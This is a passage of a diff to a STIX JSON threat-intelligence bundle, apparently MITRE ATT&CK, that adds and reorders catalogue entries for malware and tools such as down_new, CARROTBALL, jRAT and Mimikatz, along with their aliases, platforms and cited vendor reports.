+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "build_downer",
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "id": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T17:50:33.499Z",
+ "created": "2020-06-10T18:44:10.896Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "build_downer"
+ ],
"x_mitre_platforms": [
"Windows"
]
},
+ {
+ "id": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "name": "down_new",
+ "description": " [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0472",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0472"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:27:32.659Z",
+ "created": "2020-06-10T19:37:49.361Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "down_new"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"id": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -202554,14 +232650,14 @@
],
"modified": "2020-03-30T18:35:11.519Z",
"created": "2017-05-31T21:32:24.937Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "gh0st RAT"
- ],
"x_mitre_platforms": [
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "gh0st RAT"
+ ],
+ "x_mitre_version": "2.1"
},
{
"id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e",
@@ -202589,13 +232685,13 @@
],
"modified": "2020-03-30T18:36:37.734Z",
"created": "2017-05-31T21:32:46.890Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"hcdLoader"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e8268361-a599-4e45-bd3f-71c8c7e700c0",
@@ -202623,13 +232719,13 @@
],
"modified": "2020-03-30T18:37:13.552Z",
"created": "2017-05-31T21:32:45.315Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"httpclient"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2cfe8a26-5be7-4a09-8915-ea3d9e787513",
@@ -202665,14 +232761,14 @@
],
"modified": "2020-03-30T18:37:55.343Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"iKitten",
"OSX/MacDownloader"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -202735,9 +232831,9 @@
"url": "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques"
},
{
- "source_name": "NCSC Joint Report Public Tools",
+ "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.",
"url": "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf",
- "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019."
+ "source_name": "NCSC Joint Report Public Tools"
}
],
"description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)",
@@ -202748,14 +232844,9 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:38:35.850Z",
+ "modified": "2020-06-23T19:55:49.493Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "Android"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"jRAT",
"JSocket",
@@ -202768,7 +232859,12 @@
"jBiFrost",
"Trojan.Maljava"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "Android"
+ ]
},
{
"id": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945",
@@ -202818,16 +232914,16 @@
],
"modified": "2020-03-30T18:39:37.832Z",
"created": "2019-06-04T17:52:28.806Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"njRAT",
"Njw0rm",
"LV",
"Bladabindi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--800bdfba-6d66-480f-9f45-15845c05cb5d",
@@ -202855,13 +232951,13 @@
],
"modified": "2020-03-30T18:39:05.662Z",
"created": "2017-05-31T21:32:44.700Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"pngdowner"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14",
@@ -202893,13 +232989,13 @@
],
"modified": "2020-03-28T21:45:32.149Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"yty"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -202931,13 +233027,13 @@
],
"modified": "2020-03-30T18:41:33.050Z",
"created": "2019-01-30T17:48:35.006Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"zwShell"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
@@ -203002,15 +233098,49 @@
],
"modified": "2020-03-20T18:09:11.516Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "BITSAdmin"
+ "x_mitre_contributors": [
+ "Edward Millington"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Edward Millington"
+ "x_mitre_aliases": [
+ "BITSAdmin"
+ ],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0465",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0465"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)",
+ "name": "CARROTBALL",
+ "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-06-10T14:44:23.055Z",
+ "created": "2020-06-02T19:10:29.513Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "CARROTBALL"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -203039,13 +233169,13 @@
],
"modified": "2020-03-30T15:15:36.756Z",
"created": "2017-05-31T21:33:10.197Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cachedump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203055,9 +233185,9 @@
"external_id": "S0154"
},
{
- "source_name": "cobaltstrike manual",
+ "url": "https://cobaltstrike.com/downloads/csmanual38.pdf",
"description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
- "url": "https://cobaltstrike.com/downloads/csmanual38.pdf"
+ "source_name": "cobaltstrike manual"
}
],
"object_marking_refs": [
@@ -203071,18 +233201,18 @@
"labels": [
"tool"
],
- "modified": "2020-03-25T15:06:36.710Z",
+ "modified": "2020-06-23T19:49:20.159Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "Cobalt Strike"
],
"x_mitre_contributors": [
"Josh Abraham"
],
- "x_mitre_aliases": [
- "Cobalt Strike"
- ],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -203128,17 +233258,17 @@
],
"modified": "2020-03-30T02:08:26.536Z",
"created": "2019-03-11T14:13:40.648Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Empire",
"EmPyre",
"PowerShell Empire"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -203171,16 +233301,16 @@
],
"modified": "2020-03-20T18:43:16.989Z",
"created": "2019-02-19T19:17:14.971Z",
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Expand"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_aliases": [
- "Expand"
- ],
- "x_mitre_version": "1.1"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
+ ]
},
{
"id": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
@@ -203208,16 +233338,16 @@
],
"modified": "2020-03-30T16:25:40.125Z",
"created": "2017-05-31T21:33:00.565Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "FTP",
- "ftp.exe"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "FTP",
+ "ftp.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe",
@@ -203245,13 +233375,13 @@
],
"modified": "2020-03-30T16:40:33.738Z",
"created": "2017-05-31T21:33:10.569Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Fgdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
@@ -203325,15 +233455,15 @@
],
"modified": "2019-04-24T20:32:54.936Z",
"created": "2017-05-31T21:32:32.011Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
"x_mitre_aliases": [
"HTRAN",
"HUC Packet Transmit Tool"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
@@ -203371,6 +233501,43 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2018-04-18T17:59:24.739Z"
},
+ {
+ "external_references": [
+ {
+ "external_id": "S0434",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0434"
+ },
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Imminent Monitor",
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)",
+ "id": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-07-10T13:39:26.417Z",
+ "created": "2020-05-05T18:45:36.358Z",
+ "x_mitre_contributors": [
+ "Jose Luis S\u00e1nchez Martinez"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "Imminent Monitor"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"external_references": [
{
@@ -203379,9 +233546,9 @@
"url": "https://attack.mitre.org/software/S0357"
},
{
- "description": "SecureAuth. (n.d.). Retrieved January 15, 2019.",
+ "source_name": "Impacket Tools",
"url": "https://www.secureauth.com/labs/open-source-tools/impacket",
- "source_name": "Impacket Tools"
+ "description": "SecureAuth. (n.d.). Retrieved January 15, 2019."
}
],
"object_marking_refs": [
@@ -203395,19 +233562,19 @@
"labels": [
"tool"
],
- "modified": "2020-03-25T15:25:48.749Z",
+ "modified": "2020-03-31T22:20:17.889Z",
"created": "2019-01-31T01:39:56.283Z",
+ "x_mitre_contributors": [
+ "Jacob Wilkin, Trustwave, SpiderLabs"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Impacket"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_aliases": [
- "Impacket"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Jacob Wilkin, Trustwave, SpiderLabs"
]
},
{
@@ -203482,13 +233649,13 @@
],
"modified": "2020-03-30T16:55:29.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Koadic"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203520,15 +233687,15 @@
],
"modified": "2020-03-25T15:47:20.122Z",
"created": "2019-01-30T16:44:59.887Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "LaZagne"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_aliases": [
- "LaZagne"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b",
@@ -203556,13 +233723,13 @@
],
"modified": "2020-03-30T16:59:48.036Z",
"created": "2017-05-31T21:33:10.962Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Lslsass"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203590,15 +233757,15 @@
],
"modified": "2020-03-30T17:01:41.302Z",
"created": "2019-10-05T02:34:01.189Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "MailSniper"
+ ],
"x_mitre_platforms": [
"Office 365",
"Windows",
"Azure AD"
- ],
- "x_mitre_aliases": [
- "MailSniper"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27",
@@ -203626,16 +233793,16 @@
],
"modified": "2020-03-30T17:03:42.864Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Vincent Le Toux"
+ "x_mitre_platforms": [
+ "Linux"
],
"x_mitre_aliases": [
"MimiPenguin"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -203668,16 +233835,16 @@
],
"modified": "2020-03-30T17:04:12.674Z",
"created": "2017-05-31T21:32:11.544Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Vincent Le Toux"
],
"x_mitre_aliases": [
"Mimikatz"
],
- "x_mitre_contributors": [
- "Vincent Le Toux"
- ],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--03342581-f790-4f03-ba41-e82e67392e23",
@@ -203710,17 +233877,17 @@
],
"modified": "2020-03-19T13:14:50.240Z",
"created": "2017-05-31T21:32:31.601Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "Net",
- "net.exe"
+ "x_mitre_contributors": [
+ "David Ferguson, CyberSponse"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "David Ferguson, CyberSponse"
- ]
+ "x_mitre_aliases": [
+ "Net",
+ "net.exe"
+ ],
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -203748,13 +233915,13 @@
],
"modified": "2019-04-22T19:06:17.325Z",
"created": "2019-02-14T17:08:55.176Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"Nltest"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
@@ -203855,15 +234022,15 @@
],
"modified": "2020-03-30T02:37:23.626Z",
"created": "2019-04-23T12:31:58.125Z",
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "PoshC2"
+ ],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
- ],
- "x_mitre_aliases": [
- "PoshC2"
- ],
- "x_mitre_version": "1.2"
+ ]
},
{
"id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d",
@@ -203901,13 +234068,13 @@
],
"modified": "2020-03-28T21:37:30.172Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PowerSploit"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
@@ -203940,15 +234107,22 @@
],
"modified": "2020-03-20T19:20:27.565Z",
"created": "2017-05-31T21:32:21.771Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PsExec"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Pupy",
+ "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -203961,18 +234135,11 @@
"url": "https://github.com/n1nj4sec/pupy"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)",
- "name": "Pupy",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
"type": "tool",
"labels": [
"tool"
],
- "modified": "2020-03-30T17:24:25.192Z",
+ "modified": "2020-05-13T22:57:00.921Z",
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_platforms": [
"Linux",
@@ -204029,14 +234196,14 @@
],
"modified": "2020-03-28T21:39:15.210Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"QuasarRAT",
"xRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -204069,13 +234236,13 @@
],
"modified": "2019-04-19T19:04:55.892Z",
"created": "2019-03-25T12:30:40.919Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"RawDisk"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
@@ -204157,13 +234324,13 @@
],
"modified": "2020-03-30T18:03:42.421Z",
"created": "2019-01-29T18:55:20.245Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Remcos"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
@@ -204214,29 +234381,30 @@
"url": "https://attack.mitre.org/software/S0358"
},
{
- "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.",
+ "source_name": "SensePost Ruler GitHub",
"url": "https://github.com/sensepost/ruler",
- "source_name": "SensePost Ruler GitHub"
+ "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019."
},
{
- "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.",
+ "source_name": "SensePost NotRuler",
"url": "https://github.com/sensepost/notruler",
- "source_name": "SensePost NotRuler"
+ "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019."
}
],
"type": "tool",
"labels": [
"tool"
],
- "modified": "2020-03-30T18:07:20.622Z",
+ "modified": "2020-06-22T21:31:54.771Z",
"created": "2019-02-04T18:27:00.501Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ],
"x_mitre_aliases": [
"Ruler"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153",
@@ -204268,10 +234436,44 @@
],
"modified": "2019-04-24T00:37:08.653Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SDelete"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0445",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0445"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)",
+ "name": "ShimRatReporter",
+ "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "type": "tool",
+ "labels": [
+ "tool"
+ ],
+ "modified": "2020-05-27T22:39:28.701Z",
+ "created": "2020-05-12T21:29:48.294Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "ShimRatReporter"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -204373,17 +234575,17 @@
"labels": [
"tool"
],
- "modified": "2020-03-30T18:22:15.391Z",
+ "modified": "2020-05-13T22:59:15.727Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Tor"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Tor"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
@@ -204445,14 +234647,14 @@
],
"modified": "2020-03-30T18:28:34.296Z",
"created": "2017-05-31T21:32:12.684Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Windows Credential Editor",
"WCE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
@@ -204523,16 +234725,16 @@
],
"modified": "2020-03-30T18:34:22.227Z",
"created": "2017-05-31T21:33:06.824Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "at",
- "at.exe"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "at",
+ "at.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
@@ -204560,14 +234762,14 @@
],
"modified": "2019-07-31T19:57:28.859Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"certutil",
"certutil.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e",
@@ -204610,14 +234812,14 @@
],
"modified": "2020-03-20T18:38:23.242Z",
"created": "2017-05-31T21:33:05.319Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"cmd",
"cmd.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe",
@@ -204645,14 +234847,14 @@
],
"modified": "2020-03-18T20:01:55.739Z",
"created": "2017-05-31T21:33:04.937Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"dsquery",
"dsquery.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
